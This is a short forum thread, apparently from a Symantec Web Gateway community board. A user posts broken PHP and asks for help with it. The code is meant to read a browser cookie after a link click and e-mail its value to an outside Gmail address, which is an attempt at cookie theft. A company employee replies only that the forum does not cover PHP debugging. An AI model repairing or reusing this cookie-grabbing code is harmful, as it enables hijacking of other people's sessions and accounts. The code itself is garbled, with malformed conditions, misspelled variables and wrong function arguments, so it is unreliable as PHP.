Virtual Secure Web Gateway

 View Only
  • 1.  need help, php code error

    Posted Nov 04, 2014 01:06 PM

    <?php
    if
    ($cookie_name)  (isset ($_COOKIE))
    (isset ($_COOKIE[$cookie_name]))
     
    {$to="ex2@gmail.com";
    $subject="chessus lives";
    $message= "$cookie_name,  $_COOKIE [$cookie_name] " ;
    $from="ex@gmail.com";
    mail ($to,$scubject, $message [$from]);
    }
     ?>

    \*not working properly, want to retrieve cookie value,from web browser click on link and send it as e-mail*/



  • 2.  RE: need help, php code error

    Broadcom Employee
    Posted Nov 04, 2014 02:36 PM

    This is not a forum for help debugging PHP code, this is for questions and comments on the Symantec Web Gateway.